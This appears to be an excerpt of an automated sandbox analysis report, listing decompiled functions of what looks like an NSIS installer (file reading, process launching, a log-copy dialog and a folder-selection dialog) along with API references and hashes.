                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004060B0(void* _a4, void* _a8, long _a12) {
                				int _t7;
                				long _t11;
                
                				_t11 = _a12;
                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                				if(_t7 == 0 || _t11 != _a12) {
                					return 0;
                				} else {
                					return 1;
                				}
                			}





                0x004060b4
                0x004060c4
                0x004060cc
                0x00000000
                0x004060d3
                0x00000000
                0x004060d5

                APIs
                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004034E5(long _a4) {
                				long _t2;
                
                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                				return _t2;
                			}




                0x004034f3
                0x004034f9

                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E00401FA4(void* __ecx) {
                				void* _t9;
                				intOrPtr _t13;
                				void* _t15;
                				void* _t17;
                				void* _t20;
                				void* _t22;
                
                				_t17 = __ecx;
                				_t19 = E00402DA6(_t15);
                				E0040559F(0xffffffeb, _t7);
                				_t9 = E00405B20(_t19); // executed
                				_t20 = _t9;
                				if(_t20 == _t15) {
                					 *((intOrPtr*)(_t22 - 4)) = 1;
                				} else {
                					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                						_t13 = E004069B5(_t17, _t20);
                						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                							if(_t13 != _t15) {
                								 *((intOrPtr*)(_t22 - 4)) = 1;
                							}
                						} else {
                							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
                						}
                					}
                					_push(_t20);
                					CloseHandle();
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                				return 0;
                			}









                0x00401fa4
                0x00401faa
                0x00401faf
                0x00401fb5
                0x00401fba
                0x00401fbe
                0x0040292e
                0x00401fc4
                0x00401fc7
                0x00401fca
                0x00401fd2
                0x00401fe1
                0x00401fe3
                0x00401fe3
                0x00401fd4
                0x00401fd8
                0x00401fd8
                0x00401fd2
                0x00401fea
                0x00401feb
                0x00401feb
                0x00402c2d
                0x00402c39

                APIs
                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                  • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                  • Part of subcall function 00405B20: CreateProcessW.KERNELBASE ref: 00405B49
                  • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                  • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                  • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32 ref: 004069E8
                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                • String ID:
                • API String ID: 2972824698-0
                • Opcode ID: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
                • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                • Opcode Fuzzy Hash: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
                • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403B12() {
                				void* _t1;
                				signed int _t6;
                
                				_t1 =  *0x40a018; // 0xffffffff
                				if(_t1 != 0xffffffff) {
                					CloseHandle(_t1);
                					 *0x40a018 =  *0x40a018 | 0xffffffff;
                					_t6 =  *0x40a018;
                				}
                				E00403B57();
                				return E00405C49(_t6, 0x443000, 7);
                			}





                0x00403b12
                0x00403b1a
                0x00403b1d
                0x00403b23
                0x00403b23
                0x00403b23
                0x00403b2a
                0x00403b3b

                APIs
                • CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                • Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
                • Opcode Fuzzy Hash: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                • Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 95%
                			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                				struct HWND__* _v8;
                				long _v12;
                				struct tagRECT _v28;
                				void* _v36;
                				signed int _v40;
                				int _v44;
                				int _v48;
                				signed int _v52;
                				int _v56;
                				void* _v60;
                				void* _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				struct HWND__* _t94;
                				long _t95;
                				int _t100;
                				void* _t108;
                				intOrPtr _t130;
                				struct HWND__* _t134;
                				int _t156;
                				int _t159;
                				struct HMENU__* _t164;
                				struct HWND__* _t168;
                				struct HWND__* _t169;
                				int _t171;
                				void* _t172;
                				short* _t173;
                				short* _t175;
                				int _t177;
                
                				_t169 =  *0x433ee4;
                				_t156 = 0;
                				_v8 = _t169;
                				if(_a8 != 0x110) {
                					if(_a8 == 0x405) {
                						CloseHandle(CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                					}
                					if(_a8 != 0x111) {
                						L17:
                						_t171 = 1;
                						if(_a8 != 0x404) {
                							L25:
                							if(_a8 != 0x7b) {
                								goto L20;
                							}
                							_t94 = _v8;
                							if(_a12 != _t94) {
                								goto L20;
                							}
                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                							_a8 = _t95;
                							if(_t95 <= _t156) {
                								L36:
                								return 0;
                							}
                							_t164 = CreatePopupMenu();
                							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                							_t100 = _a16;
                							_t159 = _a16 >> 0x10;
                							if(_a16 == 0xffffffff) {
                								GetWindowRect(_v8,  &_v28);
                								_t100 = _v28.left;
                								_t159 = _v28.top;
                							}
                							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                								_v60 = _t156;
                								_v48 = 0x42d268;
                								_v44 = 0x1000;
                								_a4 = _a8;
                								do {
                									_a4 = _a4 - 1;
                									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                								} while (_a4 != _t156);
                								OpenClipboard(_t156);
                								EmptyClipboard();
                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                								_a4 = _t108;
                								_t172 = GlobalLock(_t108);
                								do {
                									_v48 = _t172;
                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                									 *_t173 = 0xd;
                									_t175 = _t173 + 2;
                									 *_t175 = 0xa;
                									_t172 = _t175 + 2;
                									_t156 = _t156 + 1;
                								} while (_t156 < _a8);
                								GlobalUnlock(_a4);
                								SetClipboardData(0xd, _a4);
                								CloseClipboard();
                							}
                							goto L36;
                						}
                						if( *0x433ecc == _t156) {
                							ShowWindow( *0x434f08, 8);
                							if( *0x434f8c == _t156) {
                								E0040559F( *((intOrPtr*)( *0x42c240 + 0x34)), _t156);
                							}
                							E00404472(_t171);
                							goto L25;
                						}
                						 *0x42ba38 = 2;
                						E00404472(0x78);
                						goto L20;
                					} else {
                						if(_a12 != 0x403) {
                							L20:
                							return E00404500(_a8, _a12, _a16);
                						}
                						ShowWindow( *0x433ed0, _t156);
                						ShowWindow(_t169, 8);
                						E004044CE(_t169);
                						goto L17;
                					}
                				}
                				_v52 = _v52 | 0xffffffff;
                				_v40 = _v40 | 0xffffffff;
                				_t177 = 2;
                				_v60 = _t177;
                				_v56 = 0;
                				_v48 = 0;
                				_v44 = 0;
                				asm("stosd");
                				asm("stosd");
                				_t130 =  *0x434f10;
                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                				_t134 = GetDlgItem(_a4, 0x3f8);
                				 *0x433ee4 = _t134;
                				_v8 = _t134;
                				E004044CE( *0x433ed0);
                				 *0x433ed4 = E00404E27(4);
                				 *0x433eec = 0;
                				GetClientRect(_v8,  &_v28);
                				_v52 = _v28.right - GetSystemMetrics(_t177);
                				SendMessageW(_v8, 0x1061, 0,  &_v60);
                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                				if(_a8 >= 0) {
                					SendMessageW(_v8, 0x1001, 0, _a8);
                					SendMessageW(_v8, 0x1026, 0, _a8);
                				}
                				if(_a12 >= _t156) {
                					SendMessageW(_v8, 0x1024, _t156, _a12);
                				}
                				_push( *((intOrPtr*)(_a16 + 0x30)));
                				_push(0x1b);
                				E00404499(_a4);
                				if(( *0x434f18 & 0x00000003) != 0) {
                					ShowWindow( *0x433ed0, _t156);
                					if(( *0x434f18 & 0x00000002) != 0) {
                						 *0x433ed0 = _t156;
                					} else {
                						ShowWindow(_v8, 8);
                					}
                					E004044CE( *0x433ec8);
                				}
                				_t168 = GetDlgItem(_a4, 0x3ec);
                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                				if(( *0x434f18 & 0x00000004) != 0) {
                					SendMessageW(_t168, 0x409, _t156, _a12);
                					SendMessageW(_t168, 0x2001, _t156, _a8);
                				}
                				goto L36;
                			}

































                0x004056e6
                0x004056ec
                0x004056f6
                0x004056f9
                0x0040588f
                0x004058b3
                0x004058b3
                0x004058c6
                0x004058e4
                0x004058e6
                0x004058ee
                0x00405944
                0x00405948
                0x00000000
                0x00000000
                0x0040594a
                0x00405950
                0x00000000
                0x00000000
                0x0040595a
                0x00405962
                0x00405965
                0x00405a67
                0x00000000
                0x00405a67
                0x00405974
                0x0040597f
                0x00405988
                0x00405993
                0x00405996
                0x0040599f
                0x004059a5
                0x004059a8
                0x004059a8
                0x004059c0
                0x004059c9
                0x004059cc
                0x004059d3
                0x004059da
                0x004059e2
                0x004059e2
                0x004059f9
                0x004059f9
                0x00405a00
                0x00405a06
                0x00405a12
                0x00405a19
                0x00405a22
                0x00405a24
                0x00405a27
                0x00405a36
                0x00405a39
                0x00405a3f
                0x00405a40
                0x00405a46
                0x00405a47
                0x00405a48
                0x00405a50
                0x00405a5b
                0x00405a61
                0x00405a61
                0x00000000
                0x004059c0
                0x004058f6
                0x00405926
                0x0040592e
                0x00405939
                0x00405939
                0x0040593f
                0x00000000
                0x0040593f
                0x004058fa
                0x00405904
                0x00000000
                0x004058c8
                0x004058ce
                0x00405909
                0x00000000
                0x00405912
                0x004058d7
                0x004058dc
                0x004058df
                0x00000000
                0x004058df
                0x004058c6
                0x004056ff
                0x00405703
                0x0040570b
                0x0040570f
                0x00405712
                0x00405715
                0x00405718
                0x0040571b
                0x0040571c
                0x0040571d
                0x00405736
                0x00405739
                0x00405743
                0x00405752
                0x0040575a
                0x00405762
                0x00405767
                0x0040576a
                0x00405776
                0x0040577f
                0x00405788
                0x004057aa
                0x004057b0
                0x004057c1
                0x004057c6
                0x004057d4
                0x004057e2
                0x004057e2
                0x004057e7
                0x004057f5
                0x004057f5
                0x004057fa
                0x004057fd
                0x00405802
                0x0040580e
                0x00405817
                0x00405824
                0x00405833
                0x00405826
                0x0040582b
                0x0040582b
                0x0040583f
                0x0040583f
                0x00405853
                0x0040585c
                0x00405865
                0x00405875
                0x00405881
                0x00405881
                0x00000000

                APIs
                • GetDlgItem.USER32 ref: 0040573C
                • GetDlgItem.USER32 ref: 0040574B
                • GetClientRect.USER32 ref: 00405788
                • GetSystemMetrics.USER32 ref: 0040578F
                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                • ShowWindow.USER32(?,00000008), ref: 0040582B
                • GetDlgItem.USER32 ref: 0040584C
                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                • GetDlgItem.USER32 ref: 0040575A
                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                • GetDlgItem.USER32 ref: 0040589E
                • CreateThread.KERNEL32 ref: 004058AC
                • CloseHandle.KERNEL32(00000000), ref: 004058B3
                • ShowWindow.USER32(00000000), ref: 004058D7
                • ShowWindow.USER32(?,00000008), ref: 004058DC
                • ShowWindow.USER32(00000008), ref: 00405926
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                • CreatePopupMenu.USER32 ref: 0040596B
                • AppendMenuW.USER32 ref: 0040597F
                • GetWindowRect.USER32 ref: 0040599F
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                • OpenClipboard.USER32(00000000), ref: 00405A00
                • EmptyClipboard.USER32 ref: 00405A06
                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                • GlobalLock.KERNEL32 ref: 00405A1C
                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                • SetClipboardData.USER32 ref: 00405A5B
                • CloseClipboard.USER32 ref: 00405A61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID: {
                • API String ID: 590372296-366298937
                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed int _v12;
                				long _v16;
                				long _v20;
                				long _v24;
                				char _v28;
                				intOrPtr _v32;
                				long _v36;
                				char _v40;
                				unsigned int _v44;
                				signed int _v48;
                				WCHAR* _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				WCHAR* _v72;
                				void _v76;
                				struct HWND__* _v80;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t82;
                				long _t87;
                				short* _t89;
                				void* _t95;
                				signed int _t96;
                				int _t109;
                				signed short _t114;
                				signed int _t118;
                				struct HWND__** _t122;
                				intOrPtr* _t138;
                				WCHAR* _t146;
                				unsigned int _t150;
                				signed int _t152;
                				unsigned int _t156;
                				signed int _t158;
                				signed int* _t159;
                				signed int* _t160;
                				struct HWND__* _t166;
                				struct HWND__* _t167;
                				int _t169;
                				unsigned int _t197;
                
                				_t156 = __edx;
                				_t82 =  *0x42c240;
                				_v32 = _t82;
                				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                				if(_a8 == 0x40b) {
                					E00405B81(0x3fb, _t146);
                					E004067C4(_t146);
                				}
                				_t167 = _a4;
                				if(_a8 != 0x110) {
                					L8:
                					if(_a8 != 0x111) {
                						L20:
                						if(_a8 == 0x40f) {
                							L22:
                							_v8 = _v8 & 0x00000000;
                							_v12 = _v12 & 0x00000000;
                							E00405B81(0x3fb, _t146);
                							if(E00405F14(_t186, _t146) == 0) {
                								_v8 = 1;
                							}
                							E0040653D(0x42b238, _t146);
                							_t87 = E0040690A(1);
                							_v16 = _t87;
                							if(_t87 == 0) {
                								L30:
                								E0040653D(0x42b238, _t146);
                								_t89 = E00405EB7(0x42b238);
                								_t158 = 0;
                								if(_t89 != 0) {
                									 *_t89 = 0;
                								}
                								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                									goto L35;
                								} else {
                									_t169 = 0x400;
                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                									asm("cdq");
                									_v48 = _t109;
                									_v44 = _t156;
                									_v12 = 1;
                									goto L36;
                								}
                							} else {
                								_t159 = 0;
                								if(0 == 0x42b238) {
                									goto L30;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                									if(_t114 != 0) {
                										break;
                									}
                									if(_t159 != 0) {
                										 *_t159 =  *_t159 & _t114;
                									}
                									_t160 = E00405E58(0x42b238);
                									 *_t160 =  *_t160 & 0x00000000;
                									_t159 = _t160;
                									 *_t159 = 0x5c;
                									if(_t159 != 0x42b238) {
                										continue;
                									} else {
                										goto L30;
                									}
                								}
                								_t150 = _v44;
                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                								_v44 = _t150 >> 0xa;
                								_v12 = 1;
                								_t158 = 0;
                								__eflags = 0;
                								L35:
                								_t169 = 0x400;
                								L36:
                								_t95 = E00404E27(5);
                								if(_v12 != _t158) {
                									_t197 = _v44;
                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                										_v8 = 2;
                									}
                								}
                								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                									E00404E0F(0x3ff, 0xfffffffb, _t95);
                									if(_v12 == _t158) {
                										SetDlgItemTextW(_a4, _t169, 0x42b228);
                									} else {
                										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                									}
                								}
                								_t96 = _v8;
                								 *0x434fa4 = _t96;
                								if(_t96 == _t158) {
                									_v8 = E0040140B(7);
                								}
                								if(( *(_v32 + 0x14) & _t169) != 0) {
                									_v8 = _t158;
                								}
                								E004044BB(0 | _v8 == _t158);
                								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                									E004048E3();
                								}
                								 *0x42d258 = _t158;
                								goto L53;
                							}
                						}
                						_t186 = _a8 - 0x405;
                						if(_a8 != 0x405) {
                							goto L53;
                						}
                						goto L22;
                					}
                					_t118 = _a12 & 0x0000ffff;
                					if(_t118 != 0x3fb) {
                						L12:
                						if(_t118 == 0x3e9) {
                							_t152 = 7;
                							memset( &_v76, 0, _t152 << 2);
                							_v80 = _t167;
                							_v72 = 0x42d268;
                							_v60 = E00404CE0;
                							_v56 = _t146;
                							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                							_t122 =  &_v80;
                							_v64 = 0x41;
                							__imp__SHBrowseForFolderW(_t122);
                							if(_t122 == 0) {
                								_a8 = 0x40f;
                							} else {
                								__imp__CoTaskMemFree(_t122);
                								E00405E0C(_t146);
                								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
                									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                										lstrcatW(_t146, 0x432ea0);
                									}
                								}
                								 *0x42d258 =  *0x42d258 + 1;
                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                							}
                						}
                						goto L20;
                					}
                					if(_a12 >> 0x10 != 0x300) {
                						goto L53;
                					}
                					_a8 = 0x40f;
                					goto L12;
                				} else {
                					_t166 = GetDlgItem(_t167, 0x3fb);
                					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                						E00405E0C(_t146);
                					}
                					 *0x433ed8 = _t167;
                					SetWindowTextW(_t166, _t146);
                					_push( *((intOrPtr*)(_a16 + 0x34)));
                					_push(1);
                					E00404499(_t167);
                					_push( *((intOrPtr*)(_a16 + 0x30)));
                					_push(0x14);
                					E00404499(_t167);
                					E004044CE(_t166);
                					_t138 = E0040690A(8);
                					if(_t138 == 0) {
                						L53:
                						return E00404500(_a8, _a12, _a16);
                					} else {
                						 *_t138(_t166, 1);
                						goto L8;
                					}
                				}
                			}













































                0x0040498a
                0x00404990
                0x00404996
                0x004049a3
                0x004049b1
                0x004049b4
                0x004049bc
                0x004049c2
                0x004049c2
                0x004049ce
                0x004049d1
                0x00404a3f
                0x00404a46
                0x00404b1d
                0x00404b24
                0x00404b33
                0x00404b33
                0x00404b37
                0x00404b41
                0x00404b4e
                0x00404b50
                0x00404b50
                0x00404b5e
                0x00404b65
                0x00404b6c
                0x00404b6f
                0x00404bab
                0x00404bad
                0x00404bb3
                0x00404bb8
                0x00404bbc
                0x00404bbe
                0x00404bbe
                0x00404bda
                0x00000000
                0x00404bdc
                0x00404bdf
                0x00404bed
                0x00404bf3
                0x00404bf4
                0x00404bf7
                0x00404bfa
                0x00000000
                0x00404bfa
                0x00404b71
                0x00404b73
                0x00404b77
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404b79
                0x00404b79
                0x00404b86
                0x00404b8b
                0x00000000
                0x00000000
                0x00404b8f
                0x00404b91
                0x00404b91
                0x00404b9a
                0x00404b9c
                0x00404ba1
                0x00404ba4
                0x00404ba9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404ba9
                0x00404c06
                0x00404c10
                0x00404c13
                0x00404c16
                0x00404c1d
                0x00404c1d
                0x00404c1f
                0x00404c1f
                0x00404c24
                0x00404c26
                0x00404c2e
                0x00404c35
                0x00404c37
                0x00404c42
                0x00404c42
                0x00404c37
                0x00404c52
                0x00404c5c
